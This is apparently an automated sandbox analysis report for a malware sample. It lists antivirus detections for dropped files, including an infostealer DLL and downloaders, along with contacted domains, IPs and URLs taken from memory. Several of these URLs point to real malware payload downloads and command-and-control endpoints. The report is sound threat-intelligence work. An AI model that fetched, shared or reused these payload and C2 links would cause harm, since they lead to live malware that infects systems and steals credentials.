cmd.exe 52->62         started        signatures20 process21 process22 66 conhost.exe 62->66         started        68 timeout.exe 62->68         started       

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      q4Z52wRd28.exe32%VirustotalBrowse
                      q4Z52wRd28.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll100%AviraHEUR/AGEN.1233121
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll100%AviraHEUR/AGEN.1233121
                      C:\Users\user\AppData\Local\Temp\F771.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\cttgcew100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\B4A7.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\A852.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\E35A.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\CF35.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll88%ReversingLabsWin32.Infostealer.Decred
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll71%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\B4A7.exe21%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\CF35.exe23%ReversingLabsWin64.Trojan.Lazy
                      C:\Users\user\AppData\Local\Temp\E35A.exe38%ReversingLabsWin32.Downloader.Deyma
                      C:\Users\user\AppData\Local\Temp\EB2B.exe27%ReversingLabsWin32.Trojan.Lazy
                      C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll88%ReversingLabsWin32.Infostealer.Decred
                      C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll71%MetadefenderBrowse
                      C:\Users\user\AppData\Roaming\cttgcew27%ReversingLabsWin32.Trojan.Convagent
                      SourceDetectionScannerLabelLinkDownload
                      0.2.q4Z52wRd28.exe.960e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.3.E35A.exe.880000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      47.0.RegSvcs.exe.400000.0.unpack100%AviraHEUR/AGEN.1216913Download File
                      0.3.q4Z52wRd28.exe.970000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.2.E35A.exe.870e67.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.q4Z52wRd28.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.2.E35A.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
                      11.2.cttgcew.860e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.cttgcew.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      24.2.E35A.exe.bb0000.2.unpack100%AviraHEUR/AGEN.1245293Download File
                      11.3.cttgcew.870000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      SourceDetectionScannerLabelLink
                      cdn-102.anonfiles.com3%VirustotalBrowse
                      iujdhsndjfks.ru0%VirustotalBrowse
                      raw.githubusercontent.com1%VirustotalBrowse
                      o36fafs3sn6xou.com15%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://o3b1wk8sfk74tf.com/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                      https://www.youtube.comindex0%URL Reputationsafe
                      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                      http://o3npxslymcyfi2.com/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                      http://o3l3roozuidudu.com/0%URL Reputationsafe
                      http://o36fafs3sn6xou.com/Mozilla/5.00%URL Reputationsafe
                      http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                      http://o36fafs3sn6xou.com/0%URL Reputationsafe
                      https://raw.githubusercontent.com/decoder1989/Wallet/main/Crypted.exe0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id2ResponseX%0%Avira URL Cloudsafe
                      http://65.21.213.208:3000inconsistent0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id1ResponseinX%0%Avira URL Cloudsafe
                      http://116.202.5.101/446391140202.zip100%Avira URL Cloudmalware
                      https://cdn-102.anonfiles.com/p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe0%Avira URL Cloudsafe
                      https://www.tiktok.com/@user60689725977110%Avira URL Cloudsafe
                      http://193.56.146.168/mia/solt.exe100%Avira URL Cloudmalware
                      http://116.202.5.101:80100%Avira URL Cloudmalware
                      http://193.56.146.174/g84kvj4jck/index.php?scr=1100%Avira URL Cloudmalware
                      http://tempuri.org/Entity/Id4X%0%Avira URL Cloudsafe
                      http://tempuri.org/Entity/Id22ResponseX%0%Avira URL Cloudsafe
                      https://studio.youtube.com28421709430404007434844970703125:0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cdn-102.anonfiles.com
                      195.96.151.51
                      truetrueunknown
                      bitbucket.org
                      104.192.141.1
                      truefalse
                        high
                        github.com
                        140.82.121.4
                        truefalse
                          high
                          iujdhsndjfks.ru
                          134.0.118.203
                          truefalseunknown
                          raw.githubusercontent.com
                          185.199.108.133
                          truetrueunknown
                          t.me
                          149.154.167.99
                          truefalse
                            high
                            o36fafs3sn6xou.com
                            77.232.37.228
                            truetrueunknown
                            anonfiles.com
                            45.154.253.151
                            truetrue
                              unknown
                              hoteldostyk.com
                              43.231.112.109
                              truetrue
                                unknown
                                iplogger.com
                                148.251.234.93
                                truefalse
                                  high
                                  s3-w.us-east-1.amazonaws.com
                                  3.5.21.195
                                  truefalse
                                    high
                                    youtube-ui.l.google.com
                                    216.58.215.238
                                    truefalse
                                      high
                                      srshf.com
                                      108.167.141.212
                                      truetrue
                                        unknown
                                        transfer.sh
                                        144.76.136.153
                                        truefalse
                                          high
                                          1ecosolution.it
                                          46.252.148.24
                                          truetrue
                                            unknown
                                            bbuseruploads.s3.amazonaws.com
                                            unknown
                                            unknownfalse
                                              high
                                              2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq
                                              unknown
                                              unknowntrue
                                                unknown
                                                lentaphoto.at
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.youtube.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://193.56.146.168/mia/solt.exetrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://iplogger.com/2bibu4false
                                                      high
                                                      https://raw.githubusercontent.com/decoder1989/Wallet/main/Crypted.exefalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://193.56.146.174/g84kvj4jck/index.php?scr=1true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://o3b1wk8sfk74tf.com/true
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://bitbucket.org/globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exefalse
                                                        high
                                                        https://t.me/deadftxfalse
                                                          high
                                                          http://o3npxslymcyfi2.com/true
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://o3l3roozuidudu.com/true
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://cdn-102.anonfiles.com/p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exefalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://116.202.5.101/446391140202.ziptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://www.tiktok.com/@user6068972597711true
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://o36fafs3sn6xou.com/true
                                                          • URL Reputation: safe
                                                          unknown
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/chrome_newtabF771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.drfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://duckduckgo.com/ac/?q=39680000161077974836781923.36.drfalse
                                                                    high
                                                                    http://116.202.5.101:80EB2B.exe, 00000024.00000002.525842671.0000000002EB0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    http://tempuri.org/Entity/Id12ResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm8DhF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.googleEB2B.exe, 00000024.00000003.486203645.00000000275DE000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.488632208.00000000273DD000.00000004.00000800.00020000.00000000.sdmp, 65329382289861898742549564.36.dr, 42917201296364153697665931.36.drfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id2ResponseX%F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://tempuri.org/F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id2ResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id21ResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.google.com/chrome/answer/6315198?product=42917201296364153697665931.36.drfalse
                                                                                high
                                                                                https://www.youtube.comRegSvcs.exe, 0000002F.00000002.623396941.000000C0000AA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://studio.youtube.com/youtubei/v1/security/get_web_reauth_url?alt=json&key=tls:RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows42917201296364153697665931.36.drfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/faultF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsatF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://tempuri.org/Entity/Id15ResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://support.google.com/chrome?p=update_errorEB2B.exe, 00000024.00000002.584817068.00000000276DC000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.488205767.00000000273DD000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.488388825.00000000275EA000.00000004.00000800.00020000.00000000.sdmp, 65329382289861898742549564.36.dr, 42917201296364153697665931.36.drfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://studio.youtube.com/reauthRegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://65.21.213.208:3000inconsistentRegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            low
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.google.com/intl/en_uk/chrome/Google65329382289861898742549564.36.dr, 42917201296364153697665931.36.drfalse
                                                                                                                high
                                                                                                                https://api.ip.sb/ipB4A7.exe, 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, B4A7.exe, 0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id1ResponseinX%F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=39680000161077974836781923.36.drfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id24ResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=F771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.drfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.yahoo.com/searchexplorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.youtube.comindexRegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://tempuri.org/Entity/Id5ResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://tempuri.org/Entity/Id10ResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RenewF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://tempuri.org/Entity/Id8ResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://t.me/deadftxhttps://www.tiktok.com/EB2B.exe, 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://studio.youtube.com/youtubei/v1/ars/grst?alt=json&key=net/http:RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/06/addressingexF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://o36fafs3sn6xou.com/Mozilla/5.0explorer.exe, 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.459238945.0000000000540000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000002.777469766.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.465274597.0000000000140000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000025.00000002.771553703.0000000000580000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.784028840.0000000003497000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002A.00000000.479766782.0000000000510000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002A.00000002.774664749.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002B.00000002.778517394.00000000009B8000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://tempuri.org/Entity/Id22ResponseX%F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://tempuri.org/Entity/Id4X%F771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://studio.youtube.com28421709430404007434844970703125:RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro42917201296364153697665931.36.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.google.com/intl/en_uk/chrome/42917201296364153697665931.36.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://studio.youtube.com/youtubei/v1/att/esr?alt=json&key=https://studio.youtube.com/youtubei/v1/aRegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://tempuri.org/Entity/Id13ResponseF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.853313389.0000000002AF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoF771.exe, 00000020.00000002.856653515.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000003.491597267.00000000275E1000.00000004.00000800.00020000.00000000.sdmp, 45253720055769576867799735.36.dr, 39680000161077974836781923.36.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousF771.exe, 00000020.00000002.852334346.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapF771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
